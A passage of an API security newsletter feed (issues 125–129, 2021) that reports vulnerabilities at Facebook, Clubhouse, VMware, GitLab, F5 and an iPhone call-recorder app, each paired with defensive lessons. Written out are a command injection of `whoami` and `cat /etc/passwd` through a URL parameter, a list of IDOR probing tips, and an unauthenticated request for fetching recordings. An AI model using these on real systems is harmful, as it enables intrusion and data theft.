<li>APIs need to be secured <em>by design</em>. Fixing issues only after they have been exploited can be disastrously late.</li>
<li>Monitoring, alerting, and <em>promptly reacting to</em> vulnerability reports are good additional mitigation measures.</li>
</ul>
<h2>Data leak: Clubhouse</h2>
<p>Another popular social network, Clubhouse, had a similar leak. 1.3 million user profiles got publicly posted, and — sadly — with a very similar reaction:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-7970" src="https://apisecurity.io/wp-content/uploads/2021/04/Clubhouse_leak_reaction_.jpg" alt="" width="600" height="327" /></p>
<p>As we just discussed, the fact that APIs were used to retrieve the information does not change the impact (and vendor responsibility) in any way.</p>
<p>As with Facebook, there&#8217;s a lot of good analysis of the Clubhouse story too. For example, read <a href="https://twitter.com/henkvaness/status/1381609942055059456" target="_blank" rel="noopener noreferrer">this thread by Henk Van Ess</a>.</p>
<p>The impact, too, is quite similar to Facebook&#8217;s case:</p>
<ul>
<li>As already mentioned, large datasets of user data are problematic. They enable phishing and other social engineering attacks even if the data has already been available on individual user pages.</li>
<li>The data contains links to user profiles in other social networks. For some users, this means that their private Twitter and Instagram accounts became de-anonymized.</li>
<li>Clubhouse made retrieving data easy because user IDs are <em>sequential integers</em>. Thus, APIs can be used to retrieve information on user #1, #2, #3, and so on. This makes enumerating the whole user base child&#8217;s play.</li>
</ul>
<p>Lessons learned are more or less the same or similar as with Facebook, with one extra:</p>
<ul>
<li><em>Do not use sequential IDs, ever</em>. Just a simple step of using GUIDs instead makes it harder for attackers. And do not allow attackers to iterate your user or resource records.</li>
</ul>
<h2>Analyst report: The State Of Application Security, 2021</h2>
<p>Sandy Carielli and the team at Forrester have published their report <a href="https://www.forrester.com/report/The+State+Of+Application+Security+2021/-/E-RES164041" target="_blank" rel="noopener noreferrer">&#8220;State Of Application Security, 2021&#8221;</a>. If you do not have a Forrester subscription, you can find a pretty extensive summary of the report in <a href="https://resources.whitesourcesoftware.com/blog-whitesource/forresters-state-of-application-security-2021-key-takeaways" target="_blank" rel="noopener noreferrer">Ayala Goldstein&#8217;s blog post</a>.</p>
<p>Just a few key facts from the report:</p>
<ul>
<li>Application vulnerabilities (mostly API-based) are the number one attack vector:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-7944 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/04/itemeditorimage_606edf5dd0b14.png" alt="" width="513" height="470" /></li>
<li>The researchers recommend addressing the problem by shifting security left. That means including security in the early stages of the software development lifecycle: design, development, testing.</li>
<li>DevSecOps practices and CI/CD pipelines can help with the shift: &#8220;<em>prerelease testing products offering deep integrations with core development tools like Azure DevOps, GitHub, Jenkins, and Jira.</em>&#8220;</li>
</ul>
<p>Other recommendations that the report makes:</p>
<ul>
<li>Nurture communication between security and development teams, and embrace automated security testing tools throughout development.</li>
<li>Create and use tools that developers love. Ensure that security is woven into development workflows.</li>
<li>Provide developers with tools that give remediation guidance, automate work processes, and prioritize security issues.</li>
<li>Invest in updated application security tools that can be easily integrated into future application development plans and architecture.</li>
</ul>
<h2>Online training: Building an Identity Architecture for APIs</h2>
<p>There&#8217;s a new free online course from Michał Trojanowski from Curity on <a href="https://curity.io/resources/webinars/course-building-identity-architecture/" target="_blank" rel="noopener noreferrer">Building an Identity Architecture</a> for APIs.</p>
<p>The course covers various API integration patterns for identity systems:</p>
<ul>
<li>Token flows</li>
<li>Proof-of-possession tokens</li>
<li>Scopes</li>
<li>Claims</li>
<li>Enforcement</li>
<li>Token sharing techniques</li>
<li>Entitlements</li>
</ul>
<p>If this is up your alley, do check it out.</p>
<p>The post <a href="https://apisecurity.io/issue-129-facebook-clubhouse-profiles-scraped-apis-forresters-state-application-security-2021/">Issue 129: Facebook and Clubhouse profiles scraped through APIs, Forrester&#8217;s &#8220;State of Application Security, 2021&#8221;</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 128: API flaws at VMware and GitLab, URL parameters and SSRF, webinar on recent breaches</title>
		<link>https://apisecurity.io/issue-128-api-flaws-vmware-gitlab-url-parameters-ssrf-webinar-recent-breaches/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 07 Apr 2021 22:00:03 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7915</guid>

					<description><![CDATA[<p>This week, we check out the recent API vulnerabilities at VMware and GitLab, how URL parameters can lead to server-side request forgery (SSRF) vulnerabilities, and the upcoming webinar on some of the recent real-life API security flaws. Vulnerability: VMware vRealize Operations API VMware has just patched two critical security issues in their vRealize Operations API.  [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-128-api-flaws-vmware-gitlab-url-parameters-ssrf-webinar-recent-breaches/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-128-api-flaws-vmware-gitlab-url-parameters-ssrf-webinar-recent-breaches/">Issue 128: API flaws at VMware and GitLab, URL parameters and SSRF, webinar on recent breaches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API vulnerabilities at VMware and GitLab, how URL parameters can lead to server-side request forgery (SSRF) vulnerabilities, and the upcoming webinar on some of the recent real-life API security flaws.</p>
<h2>Vulnerability: VMware vRealize Operations API</h2>
<p><a href="https://www.vmware.com/security/advisories/VMSA-2021-0004.html" target="_blank" rel="noopener noreferrer">VMware has just patched two critical security issues in their vRealize Operations API</a>.  The patched vulnerabilities are CVE-2021-21975 and CVE-2021-21983, and affect the products Cloud Foundation and vRealize Suite Lifecycle Manager.</p>
<p>As it often happens with vendor patch announcements, details are scant. Hopefully, after the embargo period is over, the researcher who reported the issues (Egor Dimitrenko from Positive Technologies) will publish a detailed write-up on how he came upon them.</p>
<p>For now, all we have are these quotes from the VMware patch announcement:</p>
<ul>
<li><em>The vRealize Operations Manager API contains a Server Side Request Forgery. A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.</em></li>
<li><em>The vRealize Operations Manager API contains an arbitrary file write vulnerability. An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.</em></li>
</ul>
<p>Neither sounds very palatable, so if you are affected by these vulnerabilities, do go and install the patch as soon as possible.</p>
<p>And if you are on the API provider side, make sure to define and enforce strict patterns for URL parameters and enforce paths for all REST API calls.</p>
<h2>Vulnerability: GitLab</h2>
<p><a href="https://hackerone.com/reports/962604" target="_blank" rel="noopener noreferrer">Muthu Prakash found a vulnerability related to user permissions in GitLab</a>. In private GitLab projects, users demoted to the Guest role lost their access to merge requests on the GitLab UI (as expected.) However, they could still get to the merge requests through APIs. GitLab has since fixed the issue.</p>
<p>This is an example of what happens when access to data and functionality is controlled by the UI. If (when) attackers go directly against the APIs behind the UI, they can simply bypass the UI limitations. They can find the required endpoints and parameters simply by proxying the calls while using a more powerful user account.</p>
<h2>API URL parameters and SSRF</h2>
<p>SSRF vulnerabilities (that already made their entrance here in the VMware case a few paragraphs up!) happen when attackers make API or web app servers invoke malicious HTTP requests that they supplied.</p>
<p>SSRF attacks can be very dangerous because the servers are within the API provider&#8217;s infrastructure and often run under powerful accounts. Calls from the server may be considered internal and could bypass a lot of security checks.</p>
<p>A researcher called <a href="https://secureitmania.medium.com/an-unknown-linux-secret-that-turned-ssrf-to-os-command-injection-6fe2f4edc202" target="_blank" rel="noopener noreferrer">secureITmania has written a nice case study</a> on an SSRF vulnerability found in an undisclosed API for PDF generation. A quick recap:</p>
<ol>
<li>The API accepted a URL as a parameter. Such APIs are often vulnerable to SSRF:
<pre class="line-numbers"><code class="language-http">https://www.example.com/api/v03/create_pdf?url=http://testsite.com&amp;cookies=a&amp;server=web</code></pre>
</li>
<li>Replacing the URL with a Burp Collaborator link allowed the researcher to observe how the API backend interacted with the <code>url</code> parameter:
<pre class="line-numbers"><code class="language-http">https://www.example.com/api/v03/create_pdf?url=http://&lt;burp-collaborator-link&gt;&amp;cookies=a&amp;server=web</code></pre>
</li>
<li>Adding the command <code>`whoami`</code> to the <code>url</code> parameter provided results showing that the command was indeed executed, indicating the vulnerability:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-7922 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/04/URL_SSRF_OS_command_injection.jpg" alt="" width="1200" height="505" /></li>
<li>The researcher then managed to send in <code>cat /etc/passwd</code> request, thus extracting sensitive account information and proving the vulnerability:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-7923 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/04/cat_etc_passwd_injection.jpg" alt="" width="1200" height="459" /></li>
</ol>
<p>This shows well how dangerous URL parameters are. Make sure you provide strict pattern definitions for them in your API definition and enforce the defined patterns before the value ends up in the backend for processing.</p>
<h2>Webinar: Dissecting the Biggest API Breaches from Q1 2021</h2>
<p>In this newsletter, we typically have a couple of API vulnerabilities every week, give a quick overview, and link it to the original story.</p>
<p>Next week, we will be trying out a new format: a webinar that goes into the details of a few of such vulnerabilities.</p>
<p>Next Thursday, <strong>April 15, at 8 am PST</strong>, yours truly (Dmitry Sotnikov) will be presenting a webinar: &#8220;<a href="https://us02web.zoom.us/webinar/register/WN_KkwF6KbXRCWVLWVLn2BrKQ" target="_blank" rel="noopener noreferrer"><strong>Dissecting the Biggest API Breaches from Q1 2021</strong></a>&#8220;.</p>
<p>I will take a few of the illustrative API vulnerabilities from the first quarter of the current year and dig deeper into the details of them:</p>
<ul>
<li>The story behind the attack or vulnerability</li>
<li>Potential or actual business impact</li>
<li>What went wrong?</li>
<li>The OWASP API Security classification</li>
<li>What could have been done to prevent the attack?</li>
<li>Relevant technology that could have helped</li>
<li>Answers to questions from the audience</li>
</ul>
<p>If this format proves successful, we plan to start hosting similar webinars regularly. Register <a href="https://us02web.zoom.us/webinar/register/WN_KkwF6KbXRCWVLWVLn2BrKQ" target="_blank" rel="noopener noreferrer">here</a> to reserve your spot, join the webinar, and do provide us feedback.</p>
<p>The post <a href="https://apisecurity.io/issue-128-api-flaws-vmware-gitlab-url-parameters-ssrf-webinar-recent-breaches/">Issue 128: API flaws at VMware and GitLab, URL parameters and SSRF, webinar on recent breaches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 127: Hidden OAuth attack vectors, Methodology for BOLA/IDOR</title>
		<link>https://apisecurity.io/issue-127-hidden-oauth-attack-vectors-methodology-for-bola-idor/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 31 Mar 2021 22:00:34 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7893</guid>

					<description><![CDATA[<p>This week, we look at an API vulnerability in Micro Focus Operation Bridge Reporter, new research on 3 hidden attack vectors in OAuth and OpenID Connect, a methodology for finding BOLA/IDOR, and research on OpenAPI adoption in the banking sector. Vulnerability: Micro Focus Operation Bridge Reporter Even authentication APIs may lead to direct remote code [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-127-hidden-oauth-attack-vectors-methodology-for-bola-idor/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-127-hidden-oauth-attack-vectors-methodology-for-bola-idor/">Issue 127: Hidden OAuth attack vectors, Methodology for BOLA/IDOR</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look at an API vulnerability in Micro Focus Operation Bridge Reporter, new research on 3 hidden attack vectors in OAuth and OpenID Connect, a methodology for finding BOLA/IDOR, and research on OpenAPI adoption in the banking sector.</p>
<h2>Vulnerability: Micro Focus Operation Bridge Reporter</h2>
<p>Even authentication APIs may lead to direct remote code execution attacks (RCE).</p>
<p><a href="https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/" target="_blank" rel="noopener noreferrer">Unit42 research team found an API flaw</a> among the vulnerabilities actively exploited by a variant of the Mirai malware in the Internet of Things (IoT) devices. The vulnerability in question is  CVE-2021-22502 in Micro Focus Operation Bridge Reporter (OBR).</p>
<p>Quoting the report:</p>
<blockquote><p><em>&#8220;The exploit works due to the unsanitized use of the “username” and “password” parameters in requests made to the LogonResource API. The vulnerability can be exploited to allow unauthenticated RCE as root on the OBR server.&#8221;</em></p></blockquote>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7896 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/Micro-Focus-OBR-unsanitized-API.png" alt="" width="1598" height="294" /></p>
<p>This is a reminder that any API inputs need to be strictly defined and enforced. For strings, that would mean using strict regular expressions and rejecting any calls that send parameters with unexpected characters.</p>
<h2>Attack Vectors: OAuth and OpenID Connect</h2>
<p>OAuth and OpenID Connect (OIDC) remain key protocols for delegated access and authentication of many modern REST APIs.</p>
<p><a href="https://portswigger.net/research/hidden-oauth-attack-vectors" target="_blank" rel="noopener noreferrer">Michael Stepankin posted a report on three hidden attack vectors on OAuth/OIDC</a> &#8211; each with an example that he found in a real-life implementation.</p>
<p><strong>1. Dynamic Client Registration &#8211; SSRF by design</strong></p>
<p>This potential vulnerability stems from the protocol&#8217;s ability to register new clients. While some OAuth/OIDC implementations have client information in the local OAuth server configuration, others expose an endpoint to add new clients (for example, <code>/register</code>.)</p>
<p>Some of the OAuth client parameters are URLs. Attackers can try to set these to point to their malicious resources. Parameters used by the OAuth server itself can open it up to a Server-side request forgery (SSRF): <code>logo_uri</code>, <code>sector_identifier_uri</code>, <code>jwks_uri</code>, <code>request_uris</code>. A successful attack would supply a link to malicious content in one of these parameters with the hope of the server retrieving and executing this malicious content.</p>
<p>Even if the server does not execute the content directly, it might still send the content to the client: for example, include the content from <code>logo_uri</code> on the web pages. If no proper validation is done &#8211; this may lead to Cross-Site Scripting (XSS) attacks.</p>
<p><strong>2. &#8220;<code>redirect_uri</code>&#8221; Session Poisoning</strong></p>
<p>When an OAuth authorization request comes in, the server needs to validate the request parameters, authenticate the user, ask for the user&#8217;s consent, and redirect back to the external party.</p>
<p>These steps are often implemented in separate controllers passing the parameters in the session. Attackers can exploit the behavior by crafting a page that would post authorization requests for a &#8220;trusted&#8221; and then immediately for an &#8220;untrustworthy&#8221; client. That second request would replace the <code>redirect_url</code> value in the session and thus cause the token to get leaked to the URL supplied by the attacker.</p>
<p><strong>3. &#8220;<code>/.well-known/webfinger</code>&#8221; makes all user names well-known</strong></p>
<p>This is the OpenID endpoint that can be used to obtain information about a user or a resource.</p>
<p>The request has a resource parameter which itself is a URL containing the name of the user:</p>
<p><code class="code-box">/.well-known/webfinger?<span class="blue">resource</span>=http:// x/<span class="orange">user</span>&amp;<span class="blue">rel</span>=http:// openid .net/specs/connect/1.0/issuer</code></p>
<p>This potentially exposes the OAuth server to SQL or LDAP injections when the server parses the request and performs the lookup.</p>
<h2>Pentesting: Finding IDORs</h2>
<p><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization</a> (BOLA, also known as Insecure Direct Object Reference or IDOR) is one of the most dangerous and frequently found API vulnerabilities. It happens when API calls include an identifier of a resource and the API grants access to that resource without checking caller permissions.</p>
<p>Max Corbridge published a great article on the <a href="https://www.aon.com/cyber-solutions/aon_cyber_labs/finding-more-idors-tips-and-tricks/" target="_blank" rel="noopener noreferrer">methodology for finding BOLA/IDOR vulnerabilities</a>:</p>
<ul>
<li>Determine whether the resource being referenced is public (not a big deal) or private (should not be accessible).</li>
<li>Find patterns in API route naming to discover new endpoints.</li>
<li>Try adding IDs even to requests that don’t have them.</li>
<li>Try replacing parameter names.</li>
<li>Supply multiple values for the same parameter.</li>
<li>Try different operations (HTTP verbs) on the same path.</li>
<li>Try changing the request’s content type.</li>
<li>Try using numeric instead of non-numeric IDs.</li>
<li>Sites allowing to save credit cards or adding users (e.g., to chats) often have IDOR.</li>
<li>Try changing the requested file types.</li>
<li>APIs often implement a CRUD (create/read/update/delete) approach to resources, so try them all.</li>
<li>Try using arrays instead of regular values.</li>
<li>Try wildcards instead of values (e.g. *).</li>
<li>See if error messages leak data.</li>
</ul>
<p>And so on. Max provides useful explanations and examples for each of the tips &#8211; so definitely worth checking out.</p>
<h2>Standards: OpenAPI adoption in banking</h2>
<p>Standards are making APIs safer. They enable a consistent approach to API security across different tools and stages of the API lifecycle: from design to development, testing, runtime protection, and monitoring.</p>
<p><a href="https://platformable.com/blog/datapoint-how-widely-adopted-is-the-openapi-specification-oas-in-the-open-banking-ecosystem/" target="_blank" rel="noopener noreferrer">Phuong Pham and Mark Boyd looked at the banking sector</a> and found rapid adoption of the OpenAPI Specification standard in the industry:</p>
<ul>
<li>Globally, 75% of all open banking platforms design their APIs by using an OpenAPI Specification</li>
<li>In Q4 2020, the use of OAS grew by 68% over adoption levels in Q3 2020.</li>
</ul>
<p>They also found that the adoption differs across regions. Parts of the globe where Open Banking regulations have a long history (such as the UK and Europe) demonstrate wider adoption of the standard:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7900 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/Global-Open-Banking-Use-of-OpenAPI-Specification-end-2020-N-559-.png" alt="" width="762" height="411" /></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-127-hidden-oauth-attack-vectors-methodology-for-bola-idor/">Issue 127: Hidden OAuth attack vectors, Methodology for BOLA/IDOR</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 126: F5 iControl REST API under attack, Regexploit, Ford&#8217;s API security talk recording</title>
		<link>https://apisecurity.io/issue-126-f5-icontrol-rest-api-attack-regexploit-fords-api-security-talk-recording/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 24 Mar 2021 22:00:03 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7877</guid>

					<description><![CDATA[<p>This week, we check out the recent API vulnerabilities at F5 and Facebook, there&#8217;s a new tool to locate regular expressions vulnerable to Denial-of-Service (DoS) attacks, and we have the recording of Ford&#8217;s recent talk on their API security policies and lessons learned. Vulnerability: F5 iControl REST API This one appears to be the most [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-126-f5-icontrol-rest-api-attack-regexploit-fords-api-security-talk-recording/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-126-f5-icontrol-rest-api-attack-regexploit-fords-api-security-talk-recording/">Issue 126: F5 iControl REST API under attack, Regexploit, Ford&#8217;s API security talk recording</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API vulnerabilities at F5 and Facebook, there&#8217;s a new tool to locate regular expressions vulnerable to Denial-of-Service (DoS) attacks, and we have the recording of Ford&#8217;s recent talk on their API security policies and lessons learned.</p>
<h2>Vulnerability: F5 iControl REST API</h2>
<p>This one appears to be the most significant enterprise API-based attack in 2021 so far.</p>
<p>F5 BIG-IP and BIG-IQ systems are popular with enterprises. They expose iControl REST endpoints for remote administration. The API is extremely powerful, for example, it allows to run arbitrary bash commands and install additional components.</p>
<p><a href="https://support.f5.com/csp/article/K03009991" target="_blank" rel="noopener noreferrer">F5 found that the APIs were vulnerable and has released their fixes</a>, but it takes time for the companies using the products to update their deployments. Unfortunately, it <em>doesn&#8217;t</em> take much time for the bad guys to reverse-engineer the patches and launch their attacks.</p>
<p>Initially, it was believed that attackers still need to find a way to get a user authentication cookie, but lately it has turned out that authentication can be bypassed entirely. You can see the timeline, details, links to proofs-of-concept scripts, screenshots, and so on in this <a href="https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/" target="_blank" rel="noopener noreferrer">NCC Group post</a>.</p>
<p>Lessons learned:</p>
<ul>
<li>Having an API that runs arbitrary commands under the <code>root</code> account is <em>extremely</em> dangerous. API scope and privileges must be strictly defined and limited to the bare minimum as much as possible.</li>
</ul>
<h2>Vulnerability: Facebook GraphQL API</h2>
<p>Moving on to something less critical: <a href="https://spongebhav.medium.com/facebook-group-members-disclosure-e53eb83df39e" target="_blank" rel="noopener noreferrer">Baibhav Anand found a vulnerability in Facebook&#8217;s GraphQL API</a> that allowed a non-member to find out if someone was a member in a private Facebook group or not.</p>
<p>Quoting from Anand:</p>
<blockquote><p><em>&#8220;A Non-member can determine if someone is the member of a private group or not via CometHovercardQueryRendererQuery graphQL mutation. Doc_ID: 4997502340291357. By changing the actorID with the victim’s actorID and groupID with the group we want to test and in the response if it shows “WeakEntityReference” than he/she is not the member of the group. However, if it shows “StrongEntityReference” than he/she is the member of the group.&#8221;</em></p></blockquote>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7878 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/1_RnfaWLUIc53IlJ8363NVkQ.png" alt="" width="2832" height="642" /></p>
<p>Facebook quickly fixed the vulnerability after it was reported. Lessons learned here:</p>
<ul>
<li>Authorization is important. Don&#8217;t trust parameters in API calls, always verify that the caller has the rights to perform the operation on the objects.</li>
<li>Make sure that your responses do not leak information about the existence or state of objects if these are confidential.</li>
</ul>
<p>We have previously covered vulnerabilities in Facebook&#8217;s GraphQL API, for example, in our <a href="https://apisecurity.io/issue-102-vulnerabilities-facebook-campaign-apps-creating-defensible-apis/" target="_blank" rel="noopener noreferrer">issue 102</a>.</p>
<h2>Tools: Regexploit</h2>
<p>Regular expressions (regex) are a great way to define expected formats of string parameters and payloads. In fact, this is the route that JSON schema and the OpenAPI Specification (OAS) expect you to take.</p>
<p>However, not all regular expressions are created equal. It is quite easy to create a potentially resource-hungry regex that can be exploited for a DoS attack. The attacker sends a string that requires so much resources to verify against the regex that the system can become unresponsive.</p>
<p><a href="https://blog.doyensec.com/2021/03/11/regexploit.html" target="_blank" rel="noopener noreferrer">Doyensec has released an open-source tool called Regexploit</a> that can locate and report such vulnerable regexes. In fact, they successfully used the tool to locate and report the vulnerability in many open-source projects. They list more than a dozen of such reports.</p>
<p>For more details, check <a href="https://github.com/doyensec/regexploit" target="_blank" rel="noopener noreferrer">the GitHub repository of the project</a>.</p>
<h2>Video: Ford Motor Company API security story</h2>
<p>Rolling out API security across a large enterprise is not easy.</p>
<p>Darren Shelcusky, Manager of Vehicle &amp; Connectivity Cybersecurity at Ford Motor Company, recently gave a webinar talking about their experience. Needless to say that Ford is a global enterprise, with thousands of APIs and engineers working on them, and that in the world of connected cars API security is critical.</p>
<p>Check out the recording of the webinar below to learn how Ford is tackling the problem and scaling their approach, what worked, and what did not.</p>
<p><iframe loading="lazy" title="LOSING MY RELIGION: Successful and unsuccessful approaches to API Security in a global enterprise" width="640" height="360" src="https://www.youtube.com/embed/nzR6Itl6XXw?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-126-f5-icontrol-rest-api-attack-regexploit-fords-api-security-talk-recording/">Issue 126: F5 iControl REST API under attack, Regexploit, Ford&#8217;s API security talk recording</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 125: iPhone call recorder API flaw, Burp and OpenAPI, GraphQL pentesting, FAPI</title>
		<link>https://apisecurity.io/issue-125/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 17 Mar 2021 22:00:54 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7864</guid>

					<description><![CDATA[<p>This week, we look at an API vulnerability in a popular call recorder app, newly added OpenAPI support in Burp, a GraphQL pentesting lab, and the just-released Financial-grade API (FAPI) standard. Vulnerability: iPhone Automatic call recorder Anand Prakash found an API vulnerability in one of the most popular call recording apps for iPhone &#8211; Automatic [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-125/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-125/">Issue 125: iPhone call recorder API flaw, Burp and OpenAPI, GraphQL pentesting, FAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look at an API vulnerability in a popular call recorder app, newly added OpenAPI support in Burp, a GraphQL pentesting lab, and the just-released Financial-grade API (FAPI) standard.</p>
<h2>Vulnerability: iPhone Automatic call recorder</h2>
<p><a href="https://www.pingsafe.ai/blog/how-we-could-have-listened-to-anyones-call-recordings" target="_blank" rel="noopener noreferrer">Anand Prakash found an API vulnerability</a> in one of the most popular call recording apps for iPhone &#8211; <em>Automatic call recorder</em>. The application has many users and is #15 in the Business Category worldwide in iPhone&#8217;s app store.</p>
<p>The vulnerability allowed attackers to get access to any user&#8217;s phone recording &#8211; thus was extremely sensitive.</p>
<p>Here&#8217;s how the vulnerability worked:</p>
<p>1. Researchers decompiled the app and found sensitive details, including S3 buckets and hostnames.</p>
<p>2. They observed the app&#8217;s API traffic. The mobile app made a call to the <code>/fetch-sinch-recordings.php</code> API in the cloud:</p>
<pre>POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
  "UserID": "xxxxxx",
  "AppID": "xxx"
}</pre>
<p>2. The API was not protected with authentication or authorization. An attacker just had to intercept the call and issue their own, changing <code>UserID</code> to the victim&#8217;s phone number.</p>
<p>3. The API responded with information about recorded calls of that user, including the AWS S3 URL of the recording:</p>
<pre>HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
  {
    "start_time": "1604681",
    "start_time_iso": "2019-10-01T17:58:54+0100",
    "caller_number": "xxxxxxx",
    "callee": "+xxxxxxxxx",
    "marked_as_deleted": "0",
    "user_id": "xxxxxxxxxx",
    "sinch_app_id": "xxxxxxxxxxxx",
    "call_id": "xxxxxxx",
    "s3_key": "call_recordings/1011101/xyzrecording.wav"
  }
]</pre>
<p>Lessons learned:</p>
<ul>
<li>Your APIs are your attack surface.</li>
<li>Make sure your APIs require authentication (<a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>)</li>
<li>Make sure there are authorization checks so one user cannot access data belonging to another (<a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object-level authorization</a>)</li>
<li>Returning links to storage obviously means that now that cloud storage access also needs to be protected with both authentication and authorization.</li>
</ul>
<h2>Tools: Burp and OpenAPI</h2>
<p><a href="https://portswigger.net/blog/api-scanning-with-burp-suite" target="_blank" rel="noopener noreferrer">Burp Scanner has added support for API crawling and OpenAPI v3 import</a>.</p>
<p>The blog post referenced above talks about the Burp team&#8217;s design decisions when adding REST API support to their crawler. Like in the case of web page crawling, Burp wants to find the system&#8217;s attack surface, now including its APIs.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7865 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/03/4bab-article-api-scanning-with-burp-suite-diagram.jpg" alt="" width="807" height="403" /></p>
<p>The Burp team is taking advantage of the structured REST API OpenAPI v3 contracts. The tool parses the contract and then uses the following rules to generate &#8220;representative&#8221; calls. Quoting the blog post:</p>
<ul>
<li><em>Every combination of <b>server </b>(as long as it is in scope) and <b>path </b>methods (GET, POST, etc.). So if we have three servers and an endpoint with a GET and POST method, this would be 3 x 2 = 6 total endpoint locations.</em></li>
<li><em>If <b>optional </b>parameters are defined, the crawler will send at least two requests to that endpoint: one request containing only the mandatory parameters and another request that includes all of the optional parameters as well.</em></li>
<li><em>In the case of <b>enumerated </b>types, the crawler will send a separate request for each of the parameter&#8217;s permitted values.</em></li>
<li><em>In the case of <b>numeric </b>values we use the maximum and minimum values as specified.</em></li>
<li><em>If <b>example </b>sets of parameters are provided we use the final provided example.</em></li>
<li><em>If the parameters are not defined in one of the ways listed above we revert back to using Guess and Canary Keys as we do for HTML forms.</em></li>
</ul>
<h2>Pentesting: GraphQL</h2>
<p>Want to practice some GraphQL pentesting? Check out this <em>Generic University </em>lab from Katie Paxton-Fear: <a href="https://github.com/InsiderPhD/Generic-University">https://github.com/InsiderPhD/Generic-University</a></p>
<p>If you want to learn some theory behind the lab and see it in action, here is Katie&#8217;s OWASP London user group talk on that topic:</p>
<p><iframe loading="lazy" title="Finding Your Next Bug: GraphQL Hacking - Katie Paxton-Fear (@InsiderPhd)" width="640" height="480" src="https://www.youtube.com/embed/GlvNwhq-uBg?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Standards: FAPI</h2>
